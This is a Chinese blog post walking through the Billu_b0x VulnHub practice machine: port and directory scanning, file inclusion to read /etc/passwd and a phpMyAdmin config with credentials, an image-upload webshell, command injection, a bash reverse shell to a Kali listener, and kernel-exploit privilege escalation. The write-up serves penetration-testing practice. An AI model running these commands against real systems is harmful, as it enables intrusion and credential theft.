靶机-Billu_b0x root 123456

最新推荐文章于 2024-08-15 17:16:33 发布
最新推荐文章于 2024-08-15 17:16:33 发布
阅读量655 收藏 6
点赞数 12
分类专栏: 靶机 文章标签: 网络 安全 靶机 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44796547/article/details/135667936
版权

查找靶机IP

nmap查看开放端口22,80

目录扫描

查看网站,典型注入

phpmy

果然是登陆界面,不过不知道账户及密码

in.php

php的配置信息,可以看看

add.php

上传文件目录,可以上传,不过没有回显

其他页面

show.php和c.php访问页面空白

文件目录

/uploaded_images/
果然如此,刚才上传失败了

文件包含漏洞

访问test.php

得到以下界面
翻译结果:“file”参数为空。请在“file”参数中提供文件路径
需要一个参数,可能存在文件包含漏洞
POST方法成功注入

最后一个id 1000为ica的也有ssh连接权限


下载其他文件
asswd可以下载,shadow无法下载。前面说过有phpmyadmin,可以下载以下它的配置文件
file=/var/www/phpmy/config.inc.php

里面有用户名和密码
$cfg’Servers’[‘user’] = ‘root’;
$cfg’Servers’[‘password’] = ‘roottoor’;
ssh直接登录

回到网站,使用burp模糊注入测试


跳转到

利用kali上shell

需要修改 反弹代理 里面 ip


上传成功

访问之前的图片路径



查看权限

提权
内核漏洞提权
python -c ‘import pty;pty.spawn(’/bin/bash’)’
uname -a

查找内核漏洞

放到www目录下,开启apache服务
service apache2 start

网页显示上传失败。换一种思路,上传一张正常图片并在burp中抓包,在图片末尾加入
接下来还是使用burp,在URL的post请求中加入POST /panel.php?cmd=cat%20/etc/passwd;ls,正文中加入load=/uploaded_images/apple233.png&continue=continue

kali命令行里输入nc -lvnp 9999开始监听,同时burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.253.136/99990>&1” | bash,注意要将此命令先经过URL编码才能发送

随风随梦自在逍遥
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机无法获取IP地址解决办法
redwand的博客
12-17 1924
一般情况,我会将靶机网卡设置为NAT模式,同时攻击机kali也设置为NAT模式,这样靶机就和攻击机在一个网段了。但今天打开靶机Billu_b0x,这样设置居然也找不到靶机,于是重启靶机
靶机Billu_b0x练习:通过目录扫描文件配置获取root信息,使用ssh服务连接提权
7Riven's blog
01-03 526
1.主机发现 2.端口扫描 3.访问80端口看看 是一个登录窗口,未发现有效信息,尝试用sqlmap跑了一下,没什么结果 4.目录扫描 用kali自带的dirbuster扫描 为更加全面考虑,用上dirb扫描 依次访问看看 可能存在文件包含,尝试看看/etc/passwd 打开发现两个用户,分别是root、ica 直接访问c.php是空白...
billu_b0x 靶机渗透实战
n5xxxx__zy的博客
07-23 1071
这啥 我咋能知道账号是啥 1、信息收集 由于kali是137 那么142肯定是你了 或者----->arp-scan -l 主机探测: 访问80端口 尝试注入: 他竟然暗示我展示我的注入skill 没办法了不能在低调下去了 尝试了常见弱口令, 万能密码 发现它把单引号过滤掉了 怎么办 扔sqlmap跑post 以前都是跑GET,怎么跑POST呢? (1)就是让sqlmap去自...
靶机测试--Billu_b0x
ximo的博客
03-15 260
目录信息收集主机发现端口扫描目录扫描漏洞发现及利用提权拓展总结 信息收集 主机发现 端口扫描 目录扫描 这里使用了/usr/share/dirb/wordlists/big.txt这个字典(默认的字典扫不出来数据库后台): 漏洞发现及利用 老规矩,先访问80端口: 直接就是一个登录框,还说告诉了sql,尝试万能密码,失败,但是会显示sql语句,并打印输入的用户名密码: 访问其他页面: 1./add:一个文件上传的页面。 2./in 直接一个phpinfo: 3./test 提示没有file参数:
Billu_b0x2[靶机]
weixin_43736033的博客
03-14 557
主机发现: 端口探测: 开了四个端口 22 80 111 8080 用dirb扫了一下网站 访问install.php 给我跳转到了 搜了一下版本号 8.3.x存在远程执行漏洞 找到匹配时间的exp 设置set RHOST 开始攻击 拿到shell 内核是4.4.0的 提权方法没找出来 在网上搜的payload Find / -perm -u=s -type f 2>/de...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。... ... ...访问控制是 Windows 操作系统安全的重要组成部分。访问控制列表(Access Control List,ACL)是 NTFS 文件系统的重要组成...
CFS.zip_CFS-GA_cfs
09-21
**CFS加密算法详解** CFS(Chaffing and Winnowing)是一种基于混沌理论的文件加密算法,由Stanford大学的John L. Hennessy和David A. Patterson提出。该算法结合了“Chaffing”(添加混淆数据)和“Winnowing”...
网络攻防靶机-设计概要 V5.docx
09-06
网络攻防靶机-设计概要 V5.docx 网络攻防靶机是指一种可以模拟网络攻击和防御的系统,旨在提高网络安全防御能力。该系统的设计概要包括项目概况、术语与定义、项目来源与参考资料、引用标准和规范、系统总体框架、...
什么是核心交换机?这样回答太到位了
08-12 507
核心交换机是一种高性能的网络设备,位于网络层次结构的最顶层,负责处理大量数据流量并将其快速转发到正确的目的地。在这个背景下,核心交换机作为网络基础设施的中枢神经,扮演着至关重要的角色,相信大家在工作中也经常打交道。如果想从0到1系统学习,也欢迎私信我,告知学习意向,我会为你推荐最适合你的方式。今天就来讲讲核心交换机,从交换机是什么,到如何选择与部署,统统给你盘明白。衡量交换机最大数据处理能力的指标,确保它能满足当前和未来的网络流量需求。)和第3层(网络层)的交换功能,有的还支持第4层到第7层的应用级处理。
10.1 网络基础知识
yoyo勰的博客
08-14 98
了解非授权访问没有预先经过同意,就使用网络或计算机资源则被看作非授权访问,如有意避开系统访问控制机制,对网络设备及资源进行非正常使用,或擅自扩大权限,越权访问信息。它主要有以下几种形式:假冒、身份攻击、非法用户进入网络系统进行违法操作、合法用户以未授权方式进行操作等。信息泄漏或丢失指敏感数据在有意或无意中被泄漏出去或丢失,它通常包括:信息在传输中丢失或泄漏、信息在存储介质中丢失或泄漏以及通过建立隐蔽隧道等窃取敏感信息等。
华为路由的AAA是什么?
huaqianzkh的专栏
08-14 525
华为路由的AAA是Authentication(认证)、‌Authorization(授权)和Accounting(计费)的简称,‌是一种提供认证、‌授权和计费的安全管理机制。‌AAA作为一种网络安全管理机制,‌主要提供以下功能和服务:‌认证:‌验证用户是否可以获得网络访问权,‌确定哪些用户可以访问网络。‌授权:‌授权用户可以使用哪些服务,‌即对用户赋予不同的权限,‌限制用户可以使用的服务。‌计费。
网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了。
2401_84466359的博客
08-12 518
这个方向更符合于大部分人对“黑客”的认知,他们能够黑手机、黑电脑、黑网站、黑服务器、黑内网,万物皆可黑(当然是要有授权的,不然进橘子我可不管),这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。是一种面向对象、直译式电脑编程语言,具有近二十年的发展历史,成熟且稳定。压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。
出省了为什么ip地址没变?怎么修改自己的ip地址变外省的
hgdlip的博客
08-14 462
在数字时代,IP地址作为网络世界中每台设备的唯一标识,其重要性不言而喻。然而,许多人在跨省份旅行或工作时,可能会发现尽管自己已经身处新的地域,但IP地址却并未随之改变。这一现象不仅令人困惑,那么,为什么会出现这种情况?我们又该如何修改自己的IP地址以反映当前的外省位置呢?本文将为您详细解答这些问题。
搭载海光3350处理器的高速流量处理模块(用于高速网络数据处理设备应用)
最新发布
Future_2024的博客
08-15 315
高速流量处理模块通常是指在网络设备中用于处理大量数据流的硬件或软件组件。
HAProxy基本配置及参数实操
Webston的博客
08-12 945
静态#动态#以下静态和动态取决于hash_type 是否consistentfirst #使用较少static-rr #做了session 共享的web集群leastconn #数据库source#基于客户端公网IP 的会话保持Uri--------------->http #缓存服务器,CDN服务商,蓝汛、百度、阿里云、腾讯url_param--------->http #可以实现session 保持hdr #基于客户端请求报文头部做下一步处理高。
Netty原理及实战应用(下篇)
program哲学
08-12 98
本文详细介绍了netty关于websocket集成、消息推送应用、网络连接编解码等方面的内容
高级java每日一道面试题-2024年8月12日-网络篇-说一下JSONP的实现原理?
qq_43071699的博客
08-12 603
JSONP是一种非官方的跨域数据交换协议,它允许在网页中通过标签的src属性从其他域名(网站)安全地获取数据。由于浏览器的同源策略限制,直接通过Ajax等方式跨域请求数据通常是不被允许的,而JSONP则巧妙地绕过了这一限制。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值